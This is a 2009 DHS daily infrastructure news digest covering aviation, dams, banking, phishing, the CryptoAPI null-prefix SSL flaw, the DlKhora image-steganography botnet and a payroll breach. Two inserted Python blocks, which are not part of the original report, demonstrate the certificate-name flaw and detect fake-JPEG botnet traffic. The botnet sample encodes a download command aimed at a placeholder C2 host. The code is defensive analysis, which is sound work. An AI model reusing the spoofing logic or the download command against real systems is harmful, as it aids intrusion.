Department of Homeland Security Daily Open Source Infrastructure Report

Friday, October 2, 2009

Complete DHS Daily Report for October 2, 2009

Daily Report

Top Stories

• A USA Today review found that airline pilots regularly violate federal law by chit-chatting or joking during critical phases of flight — the kind of distractions that may have played a role in two recent fatal crashes that killed a total of 62 people, according to government records. (See item 15)

15. October 1, USA Today – (National) Cockpit chatter cited in six crashes. Airline pilots regularly violate federal law by chit-chatting or joking during critical phases of flight — the kind of distractions that may have played a role in two recent fatal crashes that killed a total of 62 people, according to government records. The National Transportation Safety Board (NTSB) has cited violations of the “sterile cockpit rule” in six crashes since 2004, a USA Today review found. In addition, the pilots of a commuter plane that crashed February 12 near Buffalo were casually talking minutes before the accident that killed 50 people. More than half — 11 out of 20 — of the cockpit recording transcripts released in serious accidents during the past decade contain evidence of violations, USA Today found. Comments that range from mimicking a chicken to expletive-laced jokes were captured on cockpit recordings. Since 1981, federal law has barred such banter while taxiing and flying below 10,000 feet. Pilots need to improve their discipline, according to some safety advocates. “It is sending a signal that following the regulations are not necessary,” said an NTSB board member and former airline pilot. Source:

• According to the Associated Press, the Tennessee Valley Authority will raise the height of four dams in eastern Tennessee with sand-filled containers after a new analysis suggested the dams could be topped by a worst-case flood, the federal utility said Wednesday. (See item 40)

40. October 1, Associated Press – (Tennessee) TVA to raise height of 4 dams over flood concerns. The Tennessee Valley Authority (TVA) will raise the height of four dams in eastern Tennessee with sand-filled containers after a new analysis suggested the dams could be topped by a worst-case flood, the federal utility said Wednesday. TVA officials said such an event is “highly unlikely” and would require a disaster four or five times the size of the worst flood on record in 1857. But they said new hydrology studies prepared to support an operating license for a Bellefonte Nuclear Plant downstream in Alabama suggest the measures are needed. The nation’s largest public utility plans to spend $8 million installing the temporary walls by January at the four dams and to do similar studies at 20 other tributary dams, seven other main channel dams on the Tennessee River and 17 smaller reservoirs over the next year. The temporary walls will be installed atop earthen embankments adjoining the concrete dams at Fort Loudon, Tellico, Cherokee, and Watts Bar lakes. The walls will be 1,400 to 7,000 feet long, depending on the dam, and three to four feet high. TVA calculates that a “probable maximum flood” — defined by regulators as the “most severe flood that can reasonably be predicted to occur at a site” — could overtop those four dams by one to two feet. Such a flood would require a 27-inch rain, twice the amount that caused the floods in Chattanooga and Atlanta last week. Source:

Banking and Finance Sector

11. September 30, Bloomberg – (National) Major U.S. banks’ FDIC premiums may top $10 billion. The Federal Deposit Insurance Corp.’s plan to rebuild its reserves may cost Bank of America Corp. and three of the largest U.S. banks more than $10 billion. Bank of America, the biggest U.S. lender by deposits, may owe $3.5 billion under an FDIC proposal that banks prepay three years of premiums, based on the lowest assessment rate multiplied by the bank’s $900 billion in June 30 U.S. deposits. U.S. bank premiums range from 12 cents per $100 in deposits for the safest lenders to 45 cents for banks the U.S. considers risky, said a senior regulatory counsel for the Independent Community Bankers of America. The FDIC proposed asking banks to pay premiums for the fourth quarter and next three years on Dec. 30. The fees will raise $45 billion. Source:

12. September 30, SCMagazine – (National) Two accused Romanian phishers plead innocent. Two Romanian citizens allegedly involved in a large-scale phishing scam have been extradited to the United States, where they will face fraud and identity theft charges. The men were arrested this year on separate Interpol warrants and were extradited in September, according to a joint statement from the FBI and U.S. Department of Justice. After being extradited, both men pleaded innocent to the charges — one count each of conspiracy to commit fraud in connection with access devices, conspiracy to commit bank fraud and aggravated identity theft. According to prosecutors, the defendants delivered bogus emails to the customers of a number of financial institutions, including JP Morgan Chase, Comerica Bank, Wells Fargo, eBay and PayPal, with the goal of tricking them into giving up their personal information, such as credit card, bank account and Social Security numbers. The investigation stemmed from a complaint filed by a customer of People’s United Bank, based in Connecticut. Source:

13. September 30, Reuters – (National) Lawmaker seeks support for rating agency reform. The chairman of the House Financial Services subcommittee on capital markets is seeking to gain bipartisan support for legislation that would tighten regulation of credit rating agencies, and he hopes for committee action on the bill in the next few weeks. He circulated a draft bill last week that would give the U.S. Securities and Exchange Commission power to dictate how credit rating agencies determine ratings. He said that his subcommittee will meet to discuss and vote on the legislation in the next two to three weeks. The legislation would then move to the full committee for consideration, before it could go before the full House of Representatives for a vote. Earlier on Wednesday, another House panel held a hearing into why the U.S. Securities and Exchange Commission ignored warnings from former Moody’s executives about the company’s weak compliance department and ratings process. The rating firms “played a starring role in the collapse of the financial system last year,” because they failed to capture the true risk of securities linked to poorly written mortgages, said the chairman of the House Oversight and Government Reform Committee. Source:

14. September 30, The Register – (Wyoming) Bank snafu Gmail missive never opened. The confidential email at the heart of a roundabout U.S. lawsuit against Google was never opened, according to the bank that accidentally sent the missive to the wrong Gmail account. This summer, according to court documents, an unnamed employee with the Wyoming-based Rocky Mountain Bank was asked by a customer to send some loan documents to a Gmail account used by a third party. But the employee mistakenly sent them to a different Gmail account, along with another confidential file packed with the names, addresses, tax IDs, and loan info for 1,325 of the bank’s customers. The bank attempted to retrieve the documents, sending additional messages to the account, but did not receive a reply. And when Google rightly refused to release the identity of the person behind the account, the bank sued the web giant in federal court. On September 25, the court issued a temporary restraining order, insisting that Google shut the account down and divulge whether the account was still active and whether the confidential info had been viewed. And if the account was indeed active, Google was also ordered to divulge the user’s identity and contact information. Google complied with the order, but in an email to The Reg, the company declined to say what information was revealed. Repeated calls to a lawyer for the Rocky Mountain Bank went unanswered, but according to a report from CNET News, the bank has said that the confidential message was never opened and that it has now been permanently deleted. Source:

Information Technology

30. October 1, The Register – (International) SSL spoof bug still haunts IE, Safari, Chrome. Nine weeks after a hacker demonstrated how to spoof authentication certificates for virtually any Web site on the Internet, users of Internet Explorer and many other applications remain susceptible because Microsoft has not patched the underlying vulnerability. The bug, which resides in an application programming interface known as CryptoAPI, causes IE and other applications that rely on the code to be tricked by fraudulent secure sockets layer certificates. It can be exploited to impersonate Web sites, virtual private networks, and email servers by adding a null character to the prefix of an address in a legitimate SSL credential. “There are thousands of products on Windows right now that are still vulnerable to this SSL attack, and if someone were to publicly publish a targeted null prefix certificate, they’d be in trouble,” said the white-hat hacker. “Basically, everything that runs on Windows would be vulnerable with that one certificate.” Among the browsers that rely on the Microsoft library to parse SSL certificates are Google Chrome and Apple Safari for Windows. The bug would cause both — and IE as well — to display a fraudulently authenticated Web site with no warning that anything was amiss. The Firefox browser, by contrast, fixed vulnerabilities related to the null character bug a few days after the white-hat hacker presented his demo at the Black Hat security conference in late July. It remains unclear when the bug will be fixed. Source:
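The null-prefix defect described above comes down to how a relying application compares a certificate's Common Name with the hostname it expects. The following is an added example, not code from The Register, Microsoft, or the researcher quoted in the item: it models the NUL-terminated comparison that stops at the first 0x00 next to a length-aware check that refuses any CN containing a NUL. The CN values are constructed samples and the function names are this example's own.

```python
"""Hostname-vs-certificate-CN comparison with and without the NUL-prefix defect.

Added example, not code from The Register, Microsoft or the researcher quoted
above. A C-style (strlen-based) comparison stops at the first 0x00, so a
Common Name that the issuing CA saw as "www.bank.example\x00.attacker.example"
is seen as "www.bank.example" by the relying application. The CN values are
constructed samples and the function names are this example's own.
"""


def c_string_view(raw: bytes) -> str:
    """Emulate strlen()-style handling: bytes after the first NUL are ignored."""
    cut = raw.find(b"\x00")
    return (raw if cut < 0 else raw[:cut]).decode("latin-1")


def naive_cn_matches(cn_raw: bytes, hostname: str) -> bool:
    """The vulnerable comparison: whatever the truncated C-string view says is accepted."""
    return c_string_view(cn_raw).lower() == hostname.lower()


def safe_cn_matches(cn_raw: bytes, hostname: str) -> bool:
    """Length-aware comparison: any NUL or non-printable byte is a hard mismatch."""
    if b"\x00" in cn_raw:
        return False
    try:
        cn = cn_raw.decode("ascii")
    except UnicodeDecodeError:
        return False  # anything we cannot decode cleanly is treated as a mismatch
    if not cn.isprintable():
        return False
    return cn.lower() == hostname.lower()


def audit_cert_names(cn_raw: bytes, hostname: str) -> dict:
    """Verdict per comparison strategy, plus the raw facts a reviewer would want logged."""
    return {
        "cn_as_seen_by_naive_parser": c_string_view(cn_raw),
        "cn_contains_nul": b"\x00" in cn_raw,
        "naive_accepts": naive_cn_matches(cn_raw, hostname),
        "safe_accepts": safe_cn_matches(cn_raw, hostname),
    }


# Constructed samples (not real certificates).
LEGIT_CN = b"www.bank.example"
NUL_PREFIX_CN = b"www.bank.example\x00.attacker.example"

if __name__ == "__main__":
    for label, cn in (("legit", LEGIT_CN), ("nul-prefix", NUL_PREFIX_CN)):
        print(label, audit_cert_names(cn, "www.bank.example"))
```

The practical takeaway for anyone auditing their own certificate-validation code is the `safe_cn_matches` rule: compare the full length of the name, and treat an embedded NUL as a rejection rather than a terminator.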

31. October 1, The Register – (International) Botnet buries commands in image files. Security researchers have identified a botnet that borrows an idea from steganography by burying commands in jpg images. The DlKhora botnet, which is primarily geared towards downloading other strains of malware, encodes instructions so that the command and control server appears to be serving up image files, SecureWorks reports. The server sets the HTTP Content-Type header to “image/jpeg” and prefaces the bot commands with a fake 32-byte JPEG header. The bot checks if the header matches and decodes the rest of the response to retrieve its commands. The commands are encoded using a single-byte XOR with 0x4. The botnet makes no attempt to pad files so that they resemble genuine image files, a factor that makes the servers used by DlKhora easier to pick out for detection. Malware installed by the botnet agent, as identified by SecureWorks to date, largely consists of ad hijacking nuisances. Hackers need a method for passing instructions to the Trojans on compromised machines that form part of zombie (botnet) networks. IRC channels used to be the preferred venue for command and control, but recently this has changed, with miscreants experimenting with different control channels such as Google Groups, Twitter and now “image” servers. Source:
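The detection angle the item points at (a response labelled image/jpeg whose bytes are not a JPEG) can be checked structurally. The following is an added example, not SecureWorks' or The Register's code: it walks the JPEG marker chain to decide whether a body is a plausible image, and for bodies that fail while claiming to be JPEG it strips the 32-byte fake header and undoes the XOR-0x04 encoding so an analyst can see what was served. The only facts taken from the item are the Content-Type, the 32-byte header and the XOR key; the sample bodies, the command text and the function names are constructed for this example.

```python
"""Triage of HTTP responses that claim to be JPEGs but carry encoded commands.

Added example for the DlKhora item above; not SecureWorks' or The Register's
code. Facts taken from the item: Content-Type "image/jpeg", a fake 32-byte
header, single-byte XOR with 0x04. Everything else (sample bodies, command
text, function names) is constructed here.
"""

SOI = b"\xff\xd8\xff"
EOI = b"\xff\xd9"
FAKE_HEADER_LEN = 32
XOR_KEY = 0x04


def looks_like_real_jpeg(body: bytes) -> bool:
    """Walk the JPEG marker chain; a bogus header fails before any image data."""
    if not body.startswith(SOI) or not body.endswith(EOI):
        return False
    pos = 2
    while pos + 4 <= len(body):
        if body[pos] != 0xFF:
            return False
        marker = body[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI, or SOS: entropy-coded data follows
            return True
        seg_len = int.from_bytes(body[pos + 2:pos + 4], "big")
        if seg_len < 2:  # the length field includes its own two bytes
            return False
        pos += 2 + seg_len
    return False


def decode_xor_payload(body: bytes, key: int = XOR_KEY, skip: int = FAKE_HEADER_LEN) -> bytes:
    """Strip the fake header and undo the single-byte XOR for analyst review."""
    return bytes(b ^ key for b in body[skip:])


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or whitespace."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def triage_response(content_type: str, body: bytes) -> dict:
    """Flag image/jpeg responses whose bytes are not a JPEG; show what XOR-0x04 yields."""
    claims_jpeg = content_type.split(";")[0].strip().lower() == "image/jpeg"
    valid = looks_like_real_jpeg(body)
    result = {"claims_jpeg": claims_jpeg, "valid_jpeg": valid, "verdict": "ok", "decoded": b""}
    if claims_jpeg and not valid:
        decoded = decode_xor_payload(body)
        result["decoded"] = decoded
        # Mostly printable text behind a non-JPEG "image" is the pattern the item describes.
        result["verdict"] = "suspicious" if printable_ratio(decoded) > 0.9 else "malformed"
    return result


# Constructed minimal real JPEG: SOI, APP0/JFIF segment, SOS, one scan byte, EOI.
REAL_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x00"
    + b"\xff\xd9"
)

# Constructed DlKhora-style body: 32 junk header bytes, then XOR-0x04 encoded text.
FAKE_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 28
COMMAND = b"download http://c2.placeholder.invalid/update.bin"  # placeholder, not a real host
FAKE_JPEG = FAKE_HEADER + bytes(b ^ XOR_KEY for b in COMMAND)

if __name__ == "__main__":
    print(triage_response("image/jpeg", REAL_JPEG))
    print(triage_response("image/jpeg", FAKE_JPEG))
```

The structural walk deliberately stops at the Start of Scan marker: past that point the data is entropy-coded and not worth parsing for this purpose, and a fake header never gets that far anyway.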

32. September 30, – (International) Symantec: SMBs not fully equipped. There is a large discrepancy between how SMBs perceive their disaster readiness and their actual level of preparedness. That is according to Symantec’s recently released 2009 SMB Disaster Preparedness Study. In a study conducted by Symantec into the attitudes and practices of SMBs and their customers toward technology disaster preparedness, Symantec discovered that the average SMB organization has experienced three network outages within the past 12 months, with the leading causes being virus or hacker attacks, power outages, or natural disasters. It further described the alarming finding that almost half of those companies reported that they do not yet have a plan to deal with such disruptions. The report concluded by offering advice to small-to-medium businesses to ensure that they are fully protected against the melee of threats and dangers that can befall networks today. Included in the must-do list was taking the time to decide what critical information should be secured and protected, engaging trusted industry advisors, implementing automated backup processes, and carrying out annual disaster recovery tests. Symantec says there is positive news to be taken from the responses of the SMBs canvassed. It also came to light in the study that although 47 percent of SMBs do not have a formal disaster preparedness plan, of those without plans, nearly 89 percent say they harbor plans to create one within the next six months. Source:

33. September 30, Washington Post – (National) Hackers breach payroll giant, target customers. Hackers last week apparently used stolen account information from a New Jersey company that provides online payroll services to target the firm’s customers in a scheme to steal passwords and other information. Moorestown, New Jersey-based PayChoice provides direct payroll processing services and licenses its online employee payroll management product to at least 240 other payroll processing firms, serving 125,000 organizations. Last Wednesday, a number of PayChoice customers received an e-mail warning them that they needed to download a Web browser plug-in in order to maintain uninterrupted access to, the portal for PayChoice’s online payroll service. The supposed plug-in was instead malicious software designed to steal the victim’s user names and passwords. In a statement e-mailed to Security Fix, PayChoice said the company discovered on September 23 that its online systems had been breached. The company said it immediately shut down the site and instituted fresh security measures to protect client information, such as requiring users to change their passwords. If successful, PayChoice said, the malicious sites downloaded a Trojan horse program called TrojanDownloader:Win32/Bredolab.X, which according to Microsoft is a malware program that tries to download additional malicious files and disable security software on the infected PC. According to a blogger and security expert who writes the Unixwiz blog and who had several customers who received the malicious e-mails, the malware used in the attack is poorly detected by most anti-virus products on the market today. A PayChoice spokesperson said the company was still investigating the extent of the breach, noting that PayChoice has hired two outside computer forensic experts, and that it is actively working with federal law enforcement investigators. Source:

Communications Sector

34. October 1, Adirondack Daily Enterprise – (New York) Emergency repeater removed from tower. A radio repeater meant to be used in the event of a natural disaster or other emergency is off the air after a contractor working for the village of Saranac Lake removed it from the village’s radio tower on Mount Pisgah. The disaster coordinator for the North Country Chapter of the American Red Cross said he tried to test the emergency repeater about two weeks ago and got no response. The next day the coordinator hiked up Mount Pisgah to see what was wrong with the repeater, which was installed on the tower in 2003. When he reached the top of the mountain, he was surprised to find that “The antenna had been removed and was sitting in the building next to the tower,” he said. The coordinator then contacted village officials and learned that a contractor working for the village had removed two antennas from the tower because no one could determine to whom they belonged. The disaster coordinator said the village apparently did not have a copy of the permit they received to put up the repeater, which is licensed to the American Red Cross Amateur Radio Quick Response Team. But, he said, his name, address, and phone number were on the repeater. It is unclear exactly how long the repeater has been off the air. Officials said it was removed sometime in the last couple of weeks. The village is now working with its contractor to try and get the equipment re-installed on the tower. As for the other antenna that was removed from the tower, he said they still have not been able to identify its owner. A structural analysis recently found the Mount Pisgah tower cannot support the combined weight of its existing antennas and three proposed antennas, although the village is getting a second opinion. There are currently five antennas on the tower, two of which are used by the Saranac Lake Volunteer Fire Department. The others are used by the Saranac Lake Police Department, Franklin County Emergency Services, and North Country Public Radio, which is the only paying tenant. Source:

35. September 30, Orlando Sentinel – (Florida) More charges added to Volusia’s copper thief suspect. The Volusia County Sheriff’s Office filed more burglary and grand theft charges against a man it said was connected to a second theft of copper at another cell phone tower. A 35-year-old man from Port Orange was already under arrest for burglary, grand theft, theft of copper, possession of burglary tools, and violation of probation stemming from a cell phone tower burglary on Sunday, September 27 at a Verizon tower. The most recent copper theft from an AT&T cell phone tower was reported on Monday, although an AT&T representative told law enforcement that the theft at their site happened sometime on Sunday as well. The sheriff’s office said the burglar broke through a fence, cut about 30 feet of copper ground cable, and took a copper ground bus bar. An AT&T representative looked over the copper wire taken from the man during his arrest and told investigators that the copper was AT&T’s. The first tower theft — at a Verizon tower — occurred just before 3 a.m. Sunday just west of Edgewater, the sheriff’s office said. Deputies said the burglar was riding a bicycle away from the tower. He was wearing a mask with a small flashlight on the top of it. When they stopped him to talk, they noticed he was sweating and had fresh scrapes and cuts on his shins, the sheriff’s office said. Deputies noticed a large wrench sticking out from his pocket. Then they found pliers, screwdrivers, wire cutters, and flashlights. Not much later, they discovered a duffel bag near the gate at the cell tower. The bag was stuffed with about $500 worth of copper wire. Source:,0,2734120.story

36. September 30, CNET – (Illinois) Microsoft opens Windy City data center. On most days it takes the right access badge and a biometric scan to make it inside the doors of Microsoft’s massive data center. But on September 30, the company allowed a group of reporters, customers, and partners to tour the 700,000 square foot facility. The data center, along with another just-opened facility in Dublin, Ireland and existing centers in San Antonio and Quincy, Washington, serve as the guts behind Microsoft’s online ambitions, from Bing to Hotmail to Windows Azure. Microsoft’s Chicago data center offers a merge of old and new techniques. The ground floor features sealed containers with tightly packed racks of servers, while the second floor houses more traditional server rooms. But, for all its strategic import, the ground floor of the Chicago plant looks more like a truck parking lot than a traditional data center. In each parking spot, though, Microsoft can drop off a container packed with up to 2,000 servers. Right now, only about a dozen of the 56 container spots are filled, but Microsoft executives said they expect that to change quickly. The software maker expects to eventually spend up to $500 million filling up the Chicago site with gear. The site was originally slated to open months earlier, but Microsoft delayed things due to the economy. The data center itself is housed in an unmarked warehouse in one of the Chicago area’s many industrial districts. (The software maker did not want the exact location disclosed.) Microsoft picked the spot because of its convenient spot close to cheap and abundant power as well as the fact it sits atop a major Internet connection point that houses major east-west and north-south fiber routes. Source: